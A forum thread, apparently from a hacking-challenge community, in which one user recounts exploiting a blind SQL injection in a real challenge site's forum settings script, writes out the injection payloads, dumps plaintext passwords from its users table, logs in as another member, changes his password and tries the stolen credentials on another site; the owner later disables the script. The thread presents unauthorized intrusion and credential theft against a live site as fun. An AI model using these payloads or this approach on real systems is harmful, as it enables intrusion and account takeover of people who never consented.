yeah it's pretty hard to come up with targets that are noteworthy, but the first real link from
http://bright-shadows.net/link.php

first is meta, second is down, 3rd is hackquest ... been there, 4th slyfx ..

so here we go.

How does the site work? with some cgi scripts, that take GET parameters. Presumably they run it through something like
| tr -d -c '0123456789'
so those get parameters are rock solid.

Luckily for us, there are also post variables

the message board (for level 1)
http://www.slyfx.com/cgi-bin/wb.cgi?board=1
the configurations for the forum
http://www.slyfx.com/cgi-bin/wb.cgi?action=options&board=1

wiii post values.

we mess around a bit, and we notice:
these are the post values

radiobutton=0&radiobutton2=0&select=1&action=options&board=1&Submit=Apply

and what do you know if you enter some garbage as "select"

Database Error
There has been an error in executing a database command. This error has been logged.

[ EXECUTE :: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '6666'' at line 1 ]

It's quite easy to guess that this is the sql that is throwing the error

UPDATE some_table set something=$_POST[radiobutton], somethingelse=$_POST[radiobutton2], numberofthreads= $_POST[select] where uid=6666

so it's trivial to send this as $_POST[select]

4' where uid = '6666' and 1 = 1/*

4' where uid = '6666' and 1 = 2/*

(make sure to url encode the =signs when you use live http headers)

depending on whether or not the change occurs, (you can check that by looking at the settings page again, you have a blind sql injection.

Tada ...

note, you have to change the digit at the start, in order to do multiple queries, because you can only see if a change occurs, if that number is actually different from the current setting ...

there is a users table, don't have too much fun ...


I wonder if they store it plain text ... do let me know.

hmz, they store it as plain text, that's pretty weak.

Heh I can login as Erik over there ,

I changed his password, just so you can't get it anymore.. but i'm sure it's worthless if he doesn't reuse it.
If you can't use the pw reset functionality Erik feel free to pm me, or extract your own new pw through the security hole

PS, erik's password (although a bit short) was pretty strong, Would have taken a while to brute force...
to bad it wasn't encrypted.

o rats even Caesums password doesn't work on electrica

pretty weak password though

by now you guys do listen when I say "don't reuse passwords" I'm touched

ps: caesum is level10 over at slyfx though .. wii i have access to all slyfx levels...

Not that I really want tokens, .. but it doesn't state informing *only* me

hah, 't was fun.

OMG it's rhican again!
He pwnzored another password of mine.
Gotta finish my code for finger-print authentication soon.

as a minor update, they have pulled the vulnerable script offline. Didn't get any tokens though..

Hi,Congrats, well done!
It must have been long ago I used to visit this site. I didn't take care of the account.
So now it at least had some use at all

Cu, Erik

Haha good work rhican!

You can see the vuln script @ http://slyfx.com/bad_wb.txt
You'll have to excuse the messy code, I was learning perl at the time.

Considering it was my first ever website (written back in 2001), and has had no updates since then, I think it lasted pretty well! Let me know if you find any other flaws in the above code - always interested. I've disabled all the scripts now, the sign up hasn't worked for years so not much point in keeping them live. In fact the last time I logged into the site was 2005...

I can't be bothered to make a slyfx version2, so if anyone has any suggestions on what I could use the domain for, let me know.

slyfx.

Ugh, slyfx was one of my first challenge sites, even before TheBlackSheep.
I was stuck around level 6/3 or something like that, if I remember correctly

... bye bye